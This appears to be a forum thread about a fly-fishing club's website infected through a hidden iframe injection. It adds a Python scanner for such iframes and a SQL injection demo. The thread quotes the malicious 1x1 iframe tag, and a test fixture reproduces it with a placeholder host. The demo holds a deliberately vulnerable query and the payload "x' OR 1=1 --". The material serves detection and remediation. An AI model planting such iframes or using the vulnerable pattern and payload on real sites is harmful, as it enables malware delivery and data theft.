NFR Avoid Puget Sound Fly Fishers site (MALWARE INFECTION)

DennisE

Topwater and tying.
#1
I don't know how long it will be until it gets fixed, but I strongly advise NOT trying their site. Just opening their home page will get your system infected with "Live Security Platinum". Luckily I work in IT and was using my home system, so I was able to eradicate this "scareware" and Trojan pest. It isn't an experience I would recommend, however. This happened to me twice in the last week (including today), so they are still infected.
I sent them a message through this site a few days ago, but got no response. I'll be going to the meeting on Thursday so I'll bring it up there.
 

Flyborg

Active Member
#2
It's an iframe injection. The offensive piece of code is in the first line generated to the client on their home page:

Code:
<iframe src="http://*********.in/in.cgi?55764" width="1" height="1" frameborder="0"></iframe>
(I blocked out the actual URL)

Tell them to change their FTP passwords and alert their ISP that they've been hit with an iframe injection. They'll also need to edit any files with the offensive piece of code. Just a quick glance tells me it's probably just on their home page; if it's being generated dynamically they'll need to find the code that's doing it, but my guess is someone just tossed a static line in there.
 
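A scanner for the cleanup step Flyborg describes (find every file carrying the planted tag, then remove it). This is an added example, not code from the thread or from the club's site: the sample page, the redacted-host.example placeholder (the poster blanked the real host) and the SITE_HOST value are constructed assumptions. It flags an iframe only when it is both hidden (1x1 or CSS-hidden) and pointed at a host other than the site's own, so a visible YouTube embed is left alone, and it can walk a web root or a downloaded copy of one.

```python
import os
import re
from urllib.parse import urlparse

# Constructed sample: a cut-down home page with an injected hidden iframe as
# its first line, modelled on the tag quoted in the thread. The host is a
# placeholder (the poster redacted the real one); the YouTube embed further
# down stands in for a legitimate, visible third-party iframe.
SAMPLE_HOME_PAGE = (
    '<iframe src="http://redacted-host.example/in.cgi?55764" width="1" height="1" frameborder="0"></iframe>\n'
    "<html><head><title>Puget Sound Fly Fishers</title></head>\n"
    "<body>\n"
    "<h1>Welcome</h1>\n"
    '<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>\n'
    "<p>Meeting Thursday.</p>\n"
    "</body></html>\n"
)

SITE_HOST = "example.org"  # assumption: the club's own hostname; frames to any other host count as off-site

# Opening <iframe ...> tag plus its (usually empty) closing tag, so the whole element can be removed.
IFRAME_RE = re.compile(r"(<iframe\b[^>]*>)(?:\s*</iframe\s*>)?", re.IGNORECASE)
# name="value", name='value' or name=value inside a tag
ATTR_RE = re.compile(r"([\w-]+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))")


def parse_attrs(tag):
    """Return the tag's attributes as a lower-cased dict of name -> value."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
    return attrs


def is_tiny(value, limit=1):
    """True for a width/height of 0 or 1 (with or without 'px'), the classic hidden-frame size."""
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= limit


def looks_hidden(attrs):
    """Hidden by size or by inline CSS; a visible embed fails both tests."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return (is_tiny(attrs.get("width")) or is_tiny(attrs.get("height"))
            or "display:none" in style or "visibility:hidden" in style)


def is_off_site(src, site_host):
    """True when src points at a host that is neither the site nor one of its subdomains."""
    host = (urlparse(src).hostname or "").lower()
    return bool(host) and host != site_host and not host.endswith("." + site_host)


def find_suspicious_iframes(html, site_host):
    """Flag iframes that are both hidden and off-site; report the line each sits on."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        if is_off_site(src, site_host) and looks_hidden(attrs):
            hits.append({"line": html.count("\n", 0, m.start()) + 1, "src": src, "tag": m.group(0)})
    return hits


def strip_iframes(html, hits):
    """Remove every flagged element verbatim; everything else, visible embeds included, is left alone."""
    for h in hits:
        html = html.replace(h["tag"], "")
    return html


def scan_tree(root, site_host, exts=(".html", ".htm", ".php", ".js", ".tpl")):
    """Walk a web root (or a downloaded copy of it) and return {path: hits} for files that carry a hit."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = find_suspicious_iframes(fh.read(), site_host)
                if hits:
                    report[path] = hits
    return report


if __name__ == "__main__":
    for hit in find_suspicious_iframes(SAMPLE_HOME_PAGE, SITE_HOST):
        print("line %d: hidden off-site iframe -> %s" % (hit["line"], hit["src"]))
```

Run `scan_tree("/path/to/webroot", "yourdomain.tld")` over the whole site, not just the home page, since a re-infection a week later (as DennisE reports) usually means either more than one file was touched or the dropped code is being regenerated; if the hits reappear after cleaning, something dynamic is writing them and the scanner only shows you where, not why.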

Flyborg

Active Member
#4
Left untended it'll get the site blacklisted from Google, so it could be worse :) Most of these site infections happen due to weak FTP passwords, as well as hosting software vulnerabilities. Keep your passwords strong and software up to date (especially WordPress!).
 
#8
Flyborg said:
It's an iframe injection. The offensive piece of code is in the first line generated to the client on their home page:

Code:
<iframe src="http://*********.in/in.cgi?55764" width="1" height="1" frameborder="0"></iframe>
(I blocked out the actual URL)

Tell them to change their FTP passwords and alert their ISP that they've been hit with an iframe injection. They'll also need to edit any files with the offensive piece of code. Just a quick glance tells me it's probably just on their home page; if it's being generated dynamically they'll need to find the code that's doing it, but my guess is someone just tossed a static line in there.
Changing the FTP credentials might not help much. IFRAME malware most likely occurs from SQL injection... sloppy coding, in other words.

If the miscreant had FTP access, you'd find hundreds of redirect files.... and banners, popups, etc.

Sanitize those Database queries or people talk about you on forums like this.
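The pattern this post is pointing at, as an added example rather than anything from the club's site (the thread never shows its code): a page lookup that splices the request parameter into the SQL text next to the same lookup done with a bound parameter. The "pages" table, its rows and the payload are constructed for the demo. With the unsafe version, a crafted slug turns the WHERE clause into a tautology and also comments out the published-only filter, so every row including the unpublished one comes back; the parameterised version treats the same string as data and matches nothing.

```python
import sqlite3

# Constructed sample: a tiny CMS table standing in for the site's database.
# Nothing here is the real site's schema or content.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (slug TEXT PRIMARY KEY, body TEXT, published INTEGER)")
    conn.executemany(
        "INSERT INTO pages VALUES (?, ?, ?)",
        [
            ("home", "<h1>Welcome</h1>", 1),
            ("meetings", "<p>Thursday</p>", 1),
            ("admin-notes", "<p>draft, not public</p>", 0),
        ],
    )
    return conn


def get_page_unsafe(conn, slug):
    """Vulnerable: the slug is pasted into the SQL text, so a quote in it becomes SQL syntax."""
    sql = "SELECT slug, body FROM pages WHERE slug = '%s' AND published = 1" % slug
    return conn.execute(sql).fetchall()


def get_page_safe(conn, slug):
    """Fixed: a bound parameter is always data, never SQL, whatever characters it contains."""
    sql = "SELECT slug, body FROM pages WHERE slug = ? AND published = 1"
    return conn.execute(sql, (slug,)).fetchall()


# Closes the string literal, makes the condition always true, and comments out the rest of the query.
PAYLOAD = "x' OR 1=1 --"


def demo():
    """Return the slugs each lookup yields for the injection payload and for a normal request."""
    conn = make_db()
    return {
        "unsafe": [row[0] for row in get_page_unsafe(conn, PAYLOAD)],
        "safe": [row[0] for row in get_page_safe(conn, PAYLOAD)],
        "normal": [row[0] for row in get_page_safe(conn, "home")],
    }


if __name__ == "__main__":
    for label, slugs in demo().items():
        print("%-7s -> %s" % (label, slugs))
```

The same fix applies regardless of database or language: build the statement with placeholders and hand the values to the driver separately. Escaping by hand is what "sanitizing" usually ends up meaning in practice, and it is where the mistakes creep in.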